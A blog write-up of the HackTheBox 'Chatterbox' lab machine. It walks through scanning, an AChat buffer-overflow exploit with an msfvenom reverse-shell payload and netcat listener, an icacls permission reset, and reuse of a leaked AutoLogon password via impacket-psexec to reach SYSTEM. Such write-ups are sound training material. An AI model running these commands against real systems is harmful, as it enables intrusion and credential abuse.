Flop.py
Posts 📖 Book CTF Results Tags Categories About us
Flop.py

Contents

🕵 HTB-Writeup : CHATTERBOX

Pezzz included in HackTheBox
   840 words   4 minutes 
/htb-writeup-chatterbox/featured-image.png

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

└─$ nmap -T5 -A -sV -p- -Pn 10.10.10.74
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 16:01 CEST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.74
Host is up (0.041s latency).
Not shown: 65431 closed tcp ports (conn-refused), 93 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h20m00s, deviation: 2h18m34s, median: 4h59m59s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-10T19:03:31
|_  start_date: 2022-09-10T18:59:34
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-10T15:03:27-04:00

Here, we face a Windows 7 Pro SP1 box. We have access to a port that seems to host a http server but we can’t get anything.

1
2

└─$ curl http://10.10.10.74:9255/
# no output

dirbuster

Running dirbuster we can’t find any files.

Vulnerabilities

The only information that we have is that we have a AChat chat system running on port 9256.

Searching on searchsploit we found that this service is vulnerable to a buffer overflow.

1
2
3
4
5
6
7

└─$ searchsploit AChat
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow              | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
-------------------------------------------------------- ---------------------------------

I tried the python exploit. We first have to modify the payload to set up a reverse shell. We can craft the payload with msfvenom.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

# create a reverse shell payload
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.16.11 lport=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

# modify exploit.py target address & payload
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# server_address = ('10.10.10.74', 9256)

# execute the exploit
└─$ rlwrap nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Users\Alfred>type Desktop\user.txt
type Desktop\user.txt
*************************ea80cce

We get a shell ! We can now get the user flag.

Path to the privesc

Local recon

Alfred user have all access to Administrator’s home. But we can’t get the content of the root.txt file.

1
2
3
4
5
6

C:\>cd Users\Administrator\Desktop
cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

I first search what were the file permissions. While browsing, I found that the command icacls is an “equivalent” to chmod on unix. It is used to check file access control list.

I tried to reset permission with the ìcacls /reset command and…

1
2
3
4
5
6
7
8

C:\Users\Administrator\Desktop>icacls root.txt /reset
icacls root.txt /reset
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************b1a8b4

We now have access to the flag file.

The real privesc

We can get the flag but we don’t have a nice root shell. So I run a WinPeas scan to find some interesting informations.

1
2
3
4

#### Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!

We found some default credentials on AutoLogon. AutoLogon is a Windows tool used to authenticate users automatically using AutoLogon credentials. With those credentials we can authenticate into several users.

I tried to connect as Administrator with the Impacket-psexec script using the password found.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

└─$ impacket-psexec Administrator@10.10.10.74  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file kqgJRiXp.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service yJec on 10.10.10.74.....
[*] Starting service yJec.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

We are now connected as nt authority\system !

Tags

Easy, External, Network, AChat, CVE Exploitation, CVE-2015-1578, Public Vulnerabilities, Weak Credentials, CVE-2015-1577, Information Disclosure, Password Reuse

Updated on 2022-09-12
Read Markdown
 Windows-Box
Back | Home